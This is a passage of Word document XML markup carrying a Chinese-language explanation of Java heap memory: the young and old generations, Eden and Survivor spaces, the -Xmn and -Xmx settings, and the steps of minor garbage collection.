          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>新生代</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>大多数情况下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>程序中新建的对象都从新生代分配内存，新生代由</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>Eden Space</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>和两块相同大小的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>Survivor Space</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>构成。可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>-Xmn</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>指定新生代的大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000966E6" w:rsidRPr="00F41A4C" w:rsidRDefault="000966E6" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000966E6" w:rsidRPr="00F41A4C" w:rsidRDefault="00720CCD" w:rsidP="00B25A19">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0047672D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>旧</w:t>
      </w:r>
      <w:r w:rsidR="00C15861" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>生</w:t>
      </w:r>
      <w:r w:rsidRPr="0047672D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代</w:t>
      </w:r>
      <w:r w:rsidRPr="0047672D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0047672D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>存放新生代中经过多次垃圾回收仍然存活的对象，例如缓存对象。旧生代占用大小为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>-Xmx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>值减</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>-Xmn</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>对应的值</w:t>
      </w:r>
      <w:r w:rsidR="000D4AD7">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13551" w:rsidRPr="00F41A4C" w:rsidRDefault="00A13551" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AA13C8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Young</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区又分为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Survivor Space</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    Survivor Space</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>又分为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> To Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> From Survivor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1274AD"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4535424" cy="1397203"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 1" descr="我对Java内存的认识（原创）"/>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我对Java内存的认识（原创）"/>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535468" cy="1397217"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>垃圾回收过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="00F26137">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）新生成的对象在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区完成内存分配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>     2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区满了，再创建对象，会因为申请不到空间，触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>minorGC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>young(eden+1survivor)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区的垃圾回收。（为什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eden+1survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中始终有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是空的，空的那个被标记成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>To Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>     3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>minorGC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不能被回收的对象被放入到空的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（也就是放到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>To Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
